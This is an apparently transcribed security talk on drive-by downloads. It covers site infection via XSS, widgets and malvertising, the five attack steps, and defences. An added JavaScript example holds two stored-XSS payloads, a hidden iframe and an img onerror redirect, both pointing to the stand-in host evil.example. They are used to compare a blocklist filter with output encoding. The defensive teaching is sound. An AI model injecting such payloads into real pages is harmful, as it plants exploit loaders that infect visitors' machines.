Drive-by downloads 2: malware code implementation and preventive measures

Read previous: Drive-by downloads: exploiting cross-site scripting vulnerabilities

As Neil Daswani and Lars Ewe continue their discussion, they outline the five steps that cyber criminals typically take to conduct a drive-by download. They also offer recommendations on how a website owner can prevent, or at least contain, the consequences of third-party web applications and widgets being exploited by attackers.

Neil Daswani: As Lars mentioned, software vulnerabilities, web application vulnerabilities, are a key root cause of malware getting planted on websites in terms of drive-by downloads. There are several other root causes as well. So for instance, over the past four to five years, what happened as the Web 2.0 [1] transition has occurred is that if you go to a given website, the content on that website is coming from a lot of places, not just the website itself.

Ways to infect a site

And there are a lot of widgets that are used on the websites. Some widgets are used to render advertising on a website, other widgets are used to provide audience measurement functionality, other widgets provide video playing functionality. In any case, there are tons of these different widgets, and when you visit a website there is content coming from all kinds of places. Now, of course anytime that you have a widget on a website that is rendered by a piece of JavaScript or an iFrame, the content provider or the enterprise business is pretty much giving up part of the control of the website to a third party. If that third party gets compromised, well, so can your website, and your website can be turned into a distribution vehicle for malware.

In fact, there have been specific names that have been attributed to such kinds of cases. For instance, in the case that you have a website and you have an ad widget on your website, which, you know, you may be relying on for revenue and monetizing your website; in the case that your website gets infected via malicious advertisements that come through that ad network, that’s often referred to as malvertising, and malvertising is also being increasingly used to spread malware on websites.

So in any case, attackers can use these techniques to infect a site, or two sites, or three sites, or thousands of sites because of the fact that a particular web application vulnerability might exist, say, in some third party package that is used by lots of websites. Similarly, a particular widget or an ad network might be used by many, many websites, and so when an attacker exploits any of these types of issues it typically allows them to distribute their malware through a network of websites that take advantage of this functionality.

In any case, that’s a little bit about the different vectors. So we will go through the anatomy of the steps that attackers conduct and the steps that take place when a drive-by download occurs.

There are typically 5 steps cyber criminals execute to effectively conduct drive-by downloads.

So, step one in using websites to distribute malware is you have to infect a website. In the demo that we showed earlier, it was a stored cross-site scripting vulnerability that was used to plant some drive-by download code onto a site and infect users. But there are many other ways to do it as well, as I just reviewed with regards to taking advantage of different widgets and whatnot.

The second step is, once the site has been infected, there’s a number of activities that take place online. So when a user loads a webpage that is infected, there is a whole bunch of resources on that web page. The legitimate resources on the web page get rendered, but so do the malicious JavaScripts and iFrames and whatnot that were injected.

Once those JavaScripts start running, one of the first things that the attackers’ code does is it basically fingerprints the user’s browser, figures out what version of the browser they are using, whether it’s IE or Firefox, or Chrome, or Safari. It figures out which third-party plug-ins are being used, whether they have Acrobat Reader, Flash, ActiveX installed, etc.

And depending upon that, the attackers have an online exploit database which gets consulted. And what happens is that the client-side vulnerability that is most likely to result in a successful infection is chosen, and the corresponding shellcode [2] to, say, take advantage of a buffer overflow or other type of vulnerability on the client is selected and the shellcode is delivered.

Once the shellcode is delivered, the attacker basically has control of the stack on the user’s machine and they take advantage of that capability to download a downloader – a piece of malware whose sole purpose in life is to download more malware. It basically also provides a level of interaction, so that once the attackers compromise a machine they can then decide to download different malware every single day if they like. They could one day download something that conducts fraud; another thing that it can do – and that’s the way it usually happens – is add that machine to a botnet of some sort so that they have further control over it.

Drive-by download steps:

1 – Infecting a site

2 – Invoking a client-side vulnerability

3 – Delivering a shellcode

4 – Sending a downloader

5 – Taking advantage of the infected PC

So once the downloader gets sent, once another piece of malware gets sent, it’s kind of ‘game over’ – the attacker has control over the machine. There have been many types of applications, so the cyber criminals that do this are interested in taking control of users’ machines. But they are also interested in doing things like planting malware on a corporate website because they know employees access that corporate website very often, and it provides them with a great mechanism to take advantage of compromising machines within the enterprise as well.

So there is a whole bunch of different mechanisms but these five steps: infecting the site, invoking the client-side vulnerability, sending the shellcode, sending the downloader and then doing whatever they would like with the machine – are typically the five steps that cyber criminals execute when they want to effectively conduct drive-by downloads.

So that’s a little bit about that process. What I’ll do is I’ll turn it back over to Lars to just start talking about what are some of the things that organizations can do to help protect themselves using a defense-in-depth [3] approach.

Lars Ewe: Now that we have talked about what can happen and hopefully convincingly enough proven the point that bad things can happen, very bad things indeed can happen, you wanna ask yourself – what do you do, how do you defend yourself? You know, it’s no fun just to learn how bad the state of defense is, it’s important to learn what your options are.

So the first thing is that you wanna assess your sites. You need to understand that if you are running a website, not only are you responsible for the data within your site – let’s say, you store credit card information or personal information, anything like that, obviously you carry responsibility, and many different complaints and issues will occur if you do not make sure you secure that data correctly, depending on the vector or vertical that you are in.

Lifecycle of malware protection

But just as important as that is the fact that you have a responsibility to your user base. You do not want to be the one who distributes malware to all your users; even if no data gets compromised on your site, data on the clients’, on the users’ machines might still be wiped out, or those machines might join a botnet or something like that.

All that being said, that responsibility is yours as the website owner, so do assessments regularly. You have options there as to whose services you want to use; I would encourage you to do some regular antimalware, antivirus scanning – we often refer to that as persistent security.

Every time you apply a patch to your site, you might potentially create a new security hole. Often the smallest little change in code can result in such a thing. New attack vectors come out all the time. Companies like Cenzic update their attack libraries on a very regular basis, in our case on a weekly basis.

So scanning very regularly is one thing. Then, try to prevent once you have findings. Once you know that there are vulnerabilities, try to address them – ideally in code; you have various means there, and once the vulnerability is found you then know what specifically you have to do. Either way, at the code level you can also do code reviews; there are best practices you can follow at the code level. You will find that in many cases fixing the code is not an immediate option. If you want to take (and you ought to take) quick preventive steps, then web application firewalls or any other containment technologies are the next step to look at.

As a matter of fact, you usually wanna do a two-phase approach. First, you immediately wanna put in place a firewall, you wanna filter the content, and then you wanna also in parallel start looking at the root cause at the code level and fix it at the code level, roll out a fix at the code level as well.

So there are many means at that level. After that I’ll hand it over to Neil to talk more about the malware aspect of it once you’ve taken care of the web application vulnerability aspect upfront.
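The two-phase approach Lars describes, a quick filter first and then the root-cause fix in code, is shown below in a JavaScript example added by the editor; it is not code from the talk or from Cenzic. The stored "comment" payloads are constructed, the host name evil.example is a placeholder, and the blocklist filter stands in for a WAF rule rather than any real product's ruleset. The point it makes is the one a practitioner needs: the filter contains the iframe injection used in the earlier demo, but a payload that carries its script in an event handler slips past it, while contextual output encoding neutralises both.

```javascript
// Added example (not from the original talk): the two-phase defence for a
// stored cross-site scripting hole that plants drive-by download code.
// Phase 1: a request-time blocklist in the spirit of a WAF rule (containment).
// Phase 2: the root-cause fix, HTML-encoding stored data when it is rendered.

// Constructed sample: the kind of comment the earlier demo's attacker stores,
// an invisible iframe that pulls the exploit page into every visitor's browser.
const INJECTED_COMMENT =
  'Nice post! <iframe src="http://evil.example/exploit" width="0" height="0"></iframe>';

// Constructed sample that dodges a tag blocklist: no <script> or <iframe>,
// but an event handler that runs JavaScript as soon as the image fails to load.
const EVASIVE_COMMENT =
  'Nice post! <img src=x onerror="location=\'http://evil.example/exploit\'">';

// Phase 1: containment. Strip the tags most often used to inject drive-by
// code. This buys time but does not close the hole, as EVASIVE_COMMENT shows.
function wafFilter(input) {
  return input.replace(/<\s*\/?\s*(script|iframe|object|embed)\b[^>]*>/gi, '');
}

// Phase 2: root-cause fix. Encode for the HTML text context so stored data
// is displayed as text and can never be interpreted as markup.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Crude detector used only to grade the two defences: does the rendered HTML
// still contain a script-bearing tag or an inline event-handler attribute?
function stillExecutesScript(html) {
  const scriptTag = /<\s*(script|iframe|object|embed)\b/i.test(html);
  const eventHandler = /<[^>]*\son\w+\s*=/i.test(html);
  return scriptTag || eventHandler;
}

// Two ways a site might render a stored comment into the page body.
function renderWithFilterOnly(stored) {
  return wafFilter(stored);
}

function renderWithEncoding(stored) {
  return htmlEncode(stored);
}

// Summary table of outcomes, so the comparison can be inspected in one call.
function compareDefences() {
  return {
    filterStopsIframe: !stillExecutesScript(renderWithFilterOnly(INJECTED_COMMENT)),
    filterStopsEvasive: !stillExecutesScript(renderWithFilterOnly(EVASIVE_COMMENT)),
    encodingStopsIframe: !stillExecutesScript(renderWithEncoding(INJECTED_COMMENT)),
    encodingStopsEvasive: !stillExecutesScript(renderWithEncoding(EVASIVE_COMMENT)),
  };
}

console.log(compareDefences());
```

Run with `node` to see the comparison. The filter result for the iframe payload is 'Nice post! ', which looks clean, and that is exactly why a blocklist is a stop-gap: it removes what it recognises and nothing else. Encoding at the point of output is what Lars means by fixing it at the code level, and it should be applied in parallel with the filter rather than instead of it.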

Read next: Drive-by downloads 3: web anti-malware services

[1] Web 2.0 is a loosely defined intersection of web application features that facilitate participatory information sharing, interoperability, user-centered design and collaboration on the World Wide Web.

[2] Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called ‘shellcode’ because it typically starts a command shell from which the attacker can control the compromised machine.

[3] Defense-in-depth is an information assurance (IA) concept in which multiple layers of security controls (defense) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in case a security control fails or a vulnerability is exploited.
